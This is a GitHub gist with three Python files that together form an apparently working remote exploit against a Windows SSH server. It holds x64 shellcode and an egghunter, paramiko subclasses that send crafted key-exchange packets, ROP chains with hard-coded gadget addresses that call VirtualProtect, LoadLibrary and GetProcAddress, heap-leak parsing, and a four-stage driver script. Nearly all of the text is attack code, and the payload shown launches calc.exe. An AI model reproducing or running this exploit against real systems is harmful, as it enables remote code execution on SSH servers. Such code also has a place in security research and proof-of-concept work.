Skip to content

Instantly share code, notes, and snippets.

@rwincey

rwincey/shellcode.py

Forked from YiChenChai/shellcode.py
Created September 26, 2021 15:11
Show Gist options
  • Save rwincey/55532445945b70e0d3b0caebf3477db5 to your computer and use it in GitHub Desktop.
Save rwincey/55532445945b70e0d3b0caebf3477db5 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
shellcode.py
egghunter = "I\xbe\x08\x94\x1c\x80\x01\x00\x00\x00H\xc7\xc1\x00\x11\x00\x00A\xff\x96\xd8\x0c\x00\x00H\x05\x00\x0f\x00\x00H\x8d\xa8\x00\x01\x00\x00H\x89\xc4H\x83\xecPH\xb92\xbb=\x80\x01\x00\x00\x00A\xff\x16I\x89\xc5H\x89\xc1A\xffV0H\x89\xc6H1\xdbH\x01\xdeL\x89\xe9H\x8d\x15\x02\x00\x00\x00\xeb\rVirtualQuery\x00A\xff\x96\x88\x01\x00\x00H\x89\xf1H\x89\xeaI\xc7\xc0\x00\x01\x00\x00\xff\xd0\x8b]\x18H\x8bu\x00\x8bE \xa9\x00 \x01\x00u\xbd\x8bE(\xa9\x00\x00\x02\x00t\xb3\x8bE$\xa9\x01\x00\x00\x00u\xa9L\x8d\x0c\x1eH\x8b\x06H=\xef\xbe7\x13t\x0bH\x83\xc6\x08L9\xceu\xec\xeb\x8fI\x89\xf1H\x83\xc6\x08H\x89\xf1H\xc7\xc2\x00P\x00\x00I\xc7\xc0@\x00\x00\x00H\x8d\x1d'\xff\xff\xff\xffS\xf8\xff\xe6"
buf = ""
buf += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
buf += "\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += "\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += "\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += "\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += "\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
buf += "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
buf += "\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
buf += "\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += "\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += "\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
buf += "\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
buf += "\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
buf += "\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
buf += "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
buf += "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
buf += "\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
buf += "\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41"
buf += "\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
buf += "\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
buf += "\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"
buf += "\x78\x65\x00"
shellcode = buf
Raw
testssh.py
from vulnmod import *
import paramiko
import logging
logging.basicConfig()
logging.getLogger("paramiko").setLevel(logging.DEBUG) # for example
IP = '127.0.0.1'
PORT = 22
shellcode = VulnSSHClient(pwn = 0)
shellcode.set_missing_host_key_policy(paramiko.AutoAddPolicy())
shellcode.connect(hostname=IP, username='anything',password='anything', port=PORT)
shellcode_buf = shellcode.read_comms()[0]
print 'Shellcode ptr: 0x%x' % shellcode_buf
prep = VulnSSHClient(pwn = 1)
prep.set_missing_host_key_policy(paramiko.AutoAddPolicy())
prep.connect(hostname=IP, username='anything',password='anything', port=PORT, heapleak=shellcode_buf)
heap = prep.read_comms()[0]
print 'Heap ptr: 0x%x' % heap
second = VulnSSHClient(pwn = 2)
second.set_missing_host_key_policy(paramiko.AutoAddPolicy())
second.connect(hostname=IP, username='anything',password='anything', port=PORT, heapleak=(shellcode_buf, heap))
heap1 = second.read_comms()[0]
print 'Heap ptr 2: 0x%x' % heap1
pwn = VulnSSHClient(pwn = 3)
pwn.set_missing_host_key_policy(paramiko.AutoAddPolicy())
pwn.connect(hostname=IP, username='anything',password='anything', port=PORT, heapleak=(heap, heap1))
Raw
vulnmod.py
from paramiko.transport import Transport
from paramiko.client import SSHClient
import os
import sys
import struct
import socket
import queue
import binascii
from shellcode import egghunter, shellcode
from paramiko.util import retry_on_signal, ClosingContextManager
from paramiko.common import (
xffffffff,
cMSG_CHANNEL_OPEN,
cMSG_IGNORE,
cMSG_GLOBAL_REQUEST,
DEBUG,
MSG_KEXINIT,
MSG_IGNORE,
MSG_DISCONNECT,
MSG_DEBUG,
ERROR,
WARNING,
cMSG_UNIMPLEMENTED,
INFO,
cMSG_KEXINIT,
cMSG_NEWKEYS,
MSG_NEWKEYS,
cMSG_REQUEST_SUCCESS,
cMSG_REQUEST_FAILURE,
CONNECTION_FAILED_CODE,
OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED,
OPEN_SUCCEEDED,
cMSG_CHANNEL_OPEN_FAILURE,
cMSG_CHANNEL_OPEN_SUCCESS,
MSG_GLOBAL_REQUEST,
MSG_REQUEST_SUCCESS,
MSG_REQUEST_FAILURE,
MSG_CHANNEL_OPEN_SUCCESS,
MSG_CHANNEL_OPEN_FAILURE,
MSG_CHANNEL_OPEN,
MSG_CHANNEL_SUCCESS,
MSG_CHANNEL_FAILURE,
MSG_CHANNEL_DATA,
MSG_CHANNEL_EXTENDED_DATA,
MSG_CHANNEL_WINDOW_ADJUST,
MSG_CHANNEL_REQUEST,
MSG_CHANNEL_EOF,
MSG_CHANNEL_CLOSE,
MIN_WINDOW_SIZE,
MIN_PACKET_SIZE,
MAX_WINDOW_SIZE,
DEFAULT_WINDOW_SIZE,
DEFAULT_MAX_PACKET_SIZE,
HIGHEST_USERAUTH_MESSAGE_ID,
MSG_UNIMPLEMENTED,
MSG_NAMES,
)
from paramiko.compress import ZlibCompressor, ZlibDecompressor
from paramiko.dsskey import DSSKey
from paramiko.ed25519key import Ed25519Key
from paramiko.kex_curve25519 import KexCurve25519
from paramiko.kex_gex import KexGex, KexGexSHA256
from paramiko.kex_group1 import KexGroup1
from paramiko.kex_group14 import KexGroup14, KexGroup14SHA256
from paramiko.kex_group16 import KexGroup16SHA512
from paramiko.kex_ecdh_nist import KexNistp256, KexNistp384, KexNistp521
from paramiko.kex_gss import KexGSSGex, KexGSSGroup1, KexGSSGroup14
from paramiko.message import Message
from paramiko.packet import Packetizer, NeedRekeyException
from paramiko.primes import ModulusPack
from paramiko.py3compat import string_types, long, byte_ord, b, input, PY2
from paramiko.rsakey import RSAKey
from paramiko.ecdsakey import ECDSAKey
from paramiko.server import ServerInterface
from paramiko.sftp_client import SFTPClient
from paramiko.ssh_exception import (
SSHException,
BadAuthenticationType,
ChannelException,
ProxyCommandFailure,
)
from paramiko.util import retry_on_signal, ClosingContextManager, clamp_value
from paramiko import util
SSH_PORT = 22
_active_threads = []
class VulnTransport(Transport):
def _send_message(self, data, queue = False):
if 'queue' not in dir(self):
self.queue = []
if not queue:
v = VulnMessage(self.queue + [data])
super(VulnTransport, self)._send_message(v)
self.queue = []
else:
self.queue.append(data)
def _send_kex_init(self, bad = False):
self.clear_to_send_lock.acquire()
try:
self.clear_to_send.clear()
finally:
self.clear_to_send_lock.release()
self.gss_kex_used = False
self.in_kex = True
if self.server_mode:
mp_required_prefix = "diffie-hellman-group-exchange-sha"
kex_mp = [
k
for k in self.preferred_kex
if k.startswith(mp_required_prefix)
]
if (self._modulus_pack is None) and (len(kex_mp) > 0):
# can't do group-exchange if we don't have a pack of potential
# primes
pkex = [
k
for k in self.get_security_options().kex
if not k.startswith(mp_required_prefix)
]
self.get_security_options().kex = pkex
available_server_keys = list(
filter(
list(self.server_key_dict.keys()).__contains__,
self.preferred_keys,
)
)
else:
available_server_keys = self.preferred_keys
p64 = lambda x: struct.pack('<Q', x)
spoof = '\x00' * 2
chain = [p64(0x1800bb739), # pop r8
p64(1),
p64(0x18004e28f), # add rdx, 8; sub r8, 1; jne; mov rax, rdx
p64(0x1801785c3), # pop rcx
p64(0x408),
p64(0x180170ef5), # add rax, rcx
p64(0x1800d6b21)] # mov rbp, rax; call [rdx+0x400]
chain3 =[p64(0x180037f84), # pop rax
p64(0x1803DE0A8), # next .data
p64(0x18001d9e7), # pop r9; add [rax], al
p64(0x1803DE0B0), # next next .data
p64(0x180085223), # pop rdx
p64(0x1000),
p64(0x1800bb739), # pop r8
p64(0x40),
p64(0x18001805e), # mov rax, rcx
p64(0x18001b414), # jmp [rax]
p64(0x1800e2dbd), # pop 3 rando regs
]
if self.pwn == 0:
spoof += p64(0)
spoof += egghunter
spoof = spoof.ljust(0xf8 + 2, '\x00')
spoof += p64(0x18004e170)
elif self.pwn == 1:
spoof += p64(0) + chain[0]
spoof += p64(0x1800d6b21)
spoof += '\x00' * 0x28
spoof += ''.join(chain[1:])
spoof += 'VirtualProtect' + '\x00' * 2
spoof += ''.join(chain3) + p64(0) * 3 + p64(self.heapleak + 8)
spoof = spoof.ljust(0xf8 + 2, '\x00')
spoof += p64(0x18004e170)
elif self.pwn == 2:
h, h1 = self.heapleak
base = 0x70
chain2 =[p64(0x1801785c3), # pop rcx
p64(0x1803DBB32), # kernel32.dll
p64(0x180037f84), # pop rax
p64(0x1801C9408), # LoadLibrary
p64(0x180094f26), # ret
p64(0x18001b414), # jmp [rax]
p64(0x18007a390), # mov rcx, rax; mov rax. rcx; add rsp, 0x28
'\x00' * 0x28,
p64(0x180085223), # pop rdx
p64(h1 + base),
p64(0x180037f84), # pop rax
p64(0x1801C9590), # GetProcAddress
p64(0x18001b414), # jmp [rax]
p64(0x1800e2dbb), # pop 4 rando regs
#
p64(0) * 4,
p64(0x1801785c3), # pop rcx
p64(h),
p64(0x18007e387), # mov [rcx], rax
p64(0x1800be5e8) # leave
# p64(0x180017fb1), # pop rdi
# p64(self.heapleak),
# p64(0x180037f84), # pop rax
# p64(self.heapleak + 8),
# p64(0x18001d9e7), # pop r9; add [rax], al
# p64(self.heapleak + 0x10),
# p64(0xbeef)
# p64(0x180085223), # pop rdx
# p64(0x1000),
# p64(0x1800bb739), # pop r8
# p64(0x40),
# p64(0x1801541bc) # jmp [rdi]
]
spoof += p64(h1)
spoof += p64(0x18000acc3)
spoof += p64(0x1800be5e8)
spoof += p64(h1 + 0x78)
spoof += ''.join(chain2)
spoof = spoof.ljust(0xf8 + 2, '\x00')
spoof += p64(0x18004e170)
print 'Total: 0x%x' % len(spoof)
elif self.pwn == 3:
h, h1 = self.heapleak
spoof += '\x00' * 0x10 + p64(0x1801C1C31) # mov rax, [rcx]; call [rax+0x10]
spoof += '\x00' * 0x20 + p64(h1)
spoof += '\x00' * 0x18 + p64(h1 - 0x400 + 8)
spoof = spoof.ljust(0xf8 + 2, '\x00')
spoof += p64(0x1800E19EC)
n = 100
for i in range(n):
pad = Message()
pad.add_byte(chr(2))
pad.add_byte(spoof)
self._send_message(pad, queue = (not i == n - 1))
shellcode_s = '\x00' * 2 + p64(0x1337beef) + shellcode.ljust(0x3800, '\x90')
shellcode_egg = Message()
shellcode_egg.add_byte(chr(2))
shellcode_egg.add_byte(shellcode_s)
self._send_message(shellcode_egg, queue = False)
print 'hi'
# raw_input('1> ')
pad = ()
if bad:
pad = ('a' * 0x120,)
m = Message()
m.add_byte(cMSG_KEXINIT)
m.add_bytes(os.urandom(16))
m.add_list(self.preferred_kex + pad)
m.add_list(available_server_keys + pad)
# print self.preferred_ciphers
if bad:
m.add_list(('none',))
else:
m.add_list(self.preferred_ciphers + pad)
m.add_list(self.preferred_ciphers + pad)
if bad:
m.add_list(('none',))
else:
m.add_list(self.preferred_macs + pad)
m.add_list(self.preferred_macs + pad)
m.add_list(self.preferred_compression)
m.add_list(self.preferred_compression)
m.add_string(bytes())
m.add_string(bytes())
m.add_boolean(False)
m.add_int(0)
# save a copy for later (needed to compute a hash)
self.local_kex_init = m.asbytes()
self._send_message(m, queue = False)
mm = Message()
mm.add_byte(chr(21))
self._send_message(mm)
# raw_input('2> ')
# self.packetizer.send_message(m)
def run(self):
# (use the exposed "run" method, because if we specify a thread target
# of a private method, threading.Thread will keep a reference to it
# indefinitely, creating a GC cycle and not letting Transport ever be
# GC'd. it's a bug in Thread.)
# Hold reference to 'sys' so we can test sys.modules to detect
# interpreter shutdown.
self.sys = sys
# active=True occurs before the thread is launched, to avoid a race
_active_threads.append(self)
tid = hex(long(id(self)) & xffffffff)
if self.server_mode:
self._log(DEBUG, "starting thread (server mode): {}".format(tid))
else:
self._log(DEBUG, "starting thread (client mode): {}".format(tid))
try:
try:
self.packetizer.write_all(b(self.local_version + "\r\n"))
self._log(
DEBUG,
"Local version/idstring: {}".format(self.local_version),
) # noqa
self._check_banner()
# The above is actually very much part of the handshake, but
# sometimes the banner can be read but the machine is not
# responding, for example when the remote ssh daemon is loaded
# in to memory but we can not read from the disk/spawn a new
# shell.
# Make sure we can specify a timeout for the initial handshake.
# Re-use the banner timeout for now.
self.packetizer.start_handshake(self.handshake_timeout)
self._send_kex_init(bad = True)
self._expect_packet(MSG_KEXINIT)
print 'heee'
# raw_input('3> ')
ptype, m = self.packetizer.read_message()
self._handler_table[ptype](self, m)
if self.pwn in (0,1,2,):
leak = self.packetizer.read_all(8, check_rekey=False)
ref = binascii.unhexlify('0000027c071f0000')
heapraw = ''.join([chr(ord(a) ^ ord(ref[i])) for i,a in enumerate(leak)])
heap = struct.unpack('<Q', heapraw)
self.comms.put(heap)
if self.completion_event is not None:
self.completion_event.set()
# raw_input('4> ')
while True:
pass
except SSHException as e:
self._log(ERROR, "Exception: " + str(e))
self._log(ERROR, util.tb_strings())
self.saved_exception = e
except EOFError as e:
self._log(DEBUG, "EOF in transport thread")
self.saved_exception = e
except socket.error as e:
if type(e.args) is tuple:
if e.args:
emsg = "{} ({:d})".format(e.args[1], e.args[0])
else: # empty tuple, e.g. socket.timeout
emsg = str(e) or repr(e)
else:
emsg = e.args
self._log(ERROR, "Socket exception: " + emsg)
self.saved_exception = e
except Exception as e:
self._log(ERROR, "Unknown exception: " + str(e))
self._log(ERROR, util.tb_strings())
self.saved_exception = e
_active_threads.remove(self)
for chan in list(self._channels.values()):
chan._unlink()
if self.active:
self.active = False
self.packetizer.close()
if self.completion_event is not None:
self.completion_event.set()
if self.auth_handler is not None:
self.auth_handler.abort()
for event in self.channel_events.values():
event.set()
try:
self.lock.acquire()
self.server_accept_cv.notify()
finally:
self.lock.release()
self.sock.close()
except:
# Don't raise spurious 'NoneType has no attribute X' errors when we
# wake up during interpreter shutdown. Or rather -- raise
# everything *if* sys.modules (used as a convenient sentinel)
# appears to still exist.
if self.sys.modules is not None:
raise
class VulnSSHClient(SSHClient):
def __init__(self, pwn = -1):
super(VulnSSHClient, self).__init__()
self.pwn = pwn
self.comms = queue.Queue()
def read_comms(self):
return self.comms.get(block = True)
def connect(
self,
hostname,
port=SSH_PORT,
username=None,
password=None,
pkey=None,
key_filename=None,
timeout=None,
allow_agent=True,
look_for_keys=True,
compress=False,
sock=None,
gss_auth=False,
gss_kex=False,
gss_deleg_creds=True,
gss_host=None,
banner_timeout=None,
auth_timeout=None,
gss_trust_dns=True,
passphrase=None,
disabled_algorithms=None,
heapleak=None
):
"""
Connect to an SSH server and authenticate to it. The server's host key
is checked against the system host keys (see `load_system_host_keys`)
and any local host keys (`load_host_keys`). If the server's hostname
is not found in either set of host keys, the missing host key policy
is used (see `set_missing_host_key_policy`). The default policy is
to reject the key and raise an `.SSHException`.
Authentication is attempted in the following order of priority:
- The ``pkey`` or ``key_filename`` passed in (if any)
- ``key_filename`` may contain OpenSSH public certificate paths
as well as regular private-key paths; when files ending in
``-cert.pub`` are found, they are assumed to match a private
key, and both components will be loaded. (The private key
itself does *not* need to be listed in ``key_filename`` for
this to occur - *just* the certificate.)
- Any key we can find through an SSH agent
- Any "id_rsa", "id_dsa" or "id_ecdsa" key discoverable in
``~/.ssh/``
- When OpenSSH-style public certificates exist that match an
existing such private key (so e.g. one has ``id_rsa`` and
``id_rsa-cert.pub``) the certificate will be loaded alongside
the private key and used for authentication.
- Plain username/password auth, if a password was given
If a private key requires a password to unlock it, and a password is
passed in, that password will be used to attempt to unlock the key.
:param str hostname: the server to connect to
:param int port: the server port to connect to
:param str username:
the username to authenticate as (defaults to the current local
username)
:param str password:
Used for password authentication; is also used for private key
decryption if ``passphrase`` is not given.
:param str passphrase:
Used for decrypting private keys.
:param .PKey pkey: an optional private key to use for authentication
:param str key_filename:
the filename, or list of filenames, of optional private key(s)
and/or certs to try for authentication
:param float timeout:
an optional timeout (in seconds) for the TCP connect
:param bool allow_agent:
set to False to disable connecting to the SSH agent
:param bool look_for_keys:
set to False to disable searching for discoverable private key
files in ``~/.ssh/``
:param bool compress: set to True to turn on compression
:param socket sock:
an open socket or socket-like object (such as a `.Channel`) to use
for communication to the target host
:param bool gss_auth:
``True`` if you want to use GSS-API authentication
:param bool gss_kex:
Perform GSS-API Key Exchange and user authentication
:param bool gss_deleg_creds: Delegate GSS-API client credentials or not
:param str gss_host:
The targets name in the kerberos database. default: hostname
:param bool gss_trust_dns:
Indicates whether or not the DNS is trusted to securely
canonicalize the name of the host being connected to (default
``True``).
:param float banner_timeout: an optional timeout (in seconds) to wait
for the SSH banner to be presented.
:param float auth_timeout: an optional timeout (in seconds) to wait for
an authentication response.
:param dict disabled_algorithms:
an optional dict passed directly to `.Transport` and its keyword
argument of the same name.
:raises:
`.BadHostKeyException` -- if the server's host key could not be
verified
:raises: `.AuthenticationException` -- if authentication failed
:raises:
`.SSHException` -- if there was any other error connecting or
establishing an SSH session
:raises socket.error: if a socket error occurred while connecting
.. versionchanged:: 1.15
Added the ``banner_timeout``, ``gss_auth``, ``gss_kex``,
``gss_deleg_creds`` and ``gss_host`` arguments.
.. versionchanged:: 2.3
Added the ``gss_trust_dns`` argument.
.. versionchanged:: 2.4
Added the ``passphrase`` argument.
.. versionchanged:: 2.6
Added the ``disabled_algorithms`` argument.
"""
if not sock:
errors = {}
# Try multiple possible address families (e.g. IPv4 vs IPv6)
to_try = list(self._families_and_addresses(hostname, port))
for af, addr in to_try:
try:
sock = socket.socket(af, socket.SOCK_STREAM)
if timeout is not None:
try:
sock.settimeout(timeout)
except:
pass
retry_on_signal(lambda: sock.connect(addr))
# Break out of the loop on success
break
except socket.error as e:
# Raise anything that isn't a straight up connection error
# (such as a resolution error)
if e.errno not in (ECONNREFUSED, EHOSTUNREACH):
raise
# Capture anything else so we know how the run looks once
# iteration is complete. Retain info about which attempt
# this was.
errors[addr] = e
# Make sure we explode usefully if no address family attempts
# succeeded. We've no way of knowing which error is the "right"
# one, so we construct a hybrid exception containing all the real
# ones, of a subclass that client code should still be watching for
# (socket.error)
if len(errors) == len(to_try):
raise NoValidConnectionsError(errors)
t = self._transport = VulnTransport(
sock,
gss_kex=gss_kex,
gss_deleg_creds=gss_deleg_creds,
disabled_algorithms=disabled_algorithms,
)
self._transport.pwn = self.pwn
self._transport.comms = self.comms
self._transport.heapleak = heapleak
self._transport.packetizer = VulnPacketizer(sock)
# self._transport.packetizer.set_hexdump(True)
self._transport.packetizer.set_log(util.get_logger("paramiko.transport"))
t.use_compression(compress=compress)
t.set_gss_host(
# t.hostname may be None, but GSS-API requires a target name.
# Therefore use hostname as fallback.
gss_host=gss_host or hostname,
trust_dns=gss_trust_dns,
gssapi_requested=gss_auth or gss_kex,
)
if self._log_channel is not None:
t.set_log_channel(self._log_channel)
if banner_timeout is not None:
t.banner_timeout = banner_timeout
if auth_timeout is not None:
t.auth_timeout = auth_timeout
if port == SSH_PORT:
server_hostkey_name = hostname
else:
server_hostkey_name = "[{}]:{}".format(hostname, port)
our_server_keys = None
our_server_keys = self._system_host_keys.get(server_hostkey_name)
if our_server_keys is None:
our_server_keys = self._host_keys.get(server_hostkey_name)
if our_server_keys is not None:
keytype = our_server_keys.keys()[0]
sec_opts = t.get_security_options()
other_types = [x for x in sec_opts.key_types if x != keytype]
sec_opts.key_types = [keytype] + other_types
t.start_client(timeout=timeout)
print 'lol'
# If GSS-API Key Exchange is performed we are not required to check the
# host key, because the host is authenticated via GSS-API / SSPI as
# well as our client.
# if not self._transport.gss_kex_used:
# server_key = t.get_remote_server_key()
# if our_server_keys is None:
# # will raise exception if the key is rejected
# self._policy.missing_host_key(
# self, server_hostkey_name, server_key
# )
# else:
# our_key = our_server_keys.get(server_key.get_name())
# if our_key != server_key:
# if our_key is None:
# our_key = list(our_server_keys.values())[0]
# raise BadHostKeyException(hostname, server_key, our_key)
# if username is None:
# username = getpass.getuser()
# if key_filename is None:
# key_filenames = []
# elif isinstance(key_filename, string_types):
# key_filenames = [key_filename]
# else:
# key_filenames = key_filename
# self._auth(
# username,
# password,
# pkey,
# key_filenames,
# allow_agent,
# look_for_keys,
# gss_auth,
# gss_kex,
# gss_deleg_creds,
# t.gss_host,
# passphrase,
# )
class FakeStr:
def __init__(self, messages):
self.messages = messages
self.thestr = ''.join([m.asbytes() for m in self.messages])
def __getitem__(self, idx):
return self.thestr[idx]
def __len__(self):
return len(self.thestr)
class VulnMessage:
def __init__(self, messages):
self.messages = messages
def asbytes(self):
return FakeStr(self.messages)
class VulnPacketizer(Packetizer):
def _build_packet(self, payload):
if payload.__class__.__name__ == 'FakeStr':
return ''.join([super(VulnPacketizer, self)._build_packet(p.asbytes()) for p in payload.messages])
return super(VulnPacketizer, self)._build_packet(payload)
# def read_message(self):
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment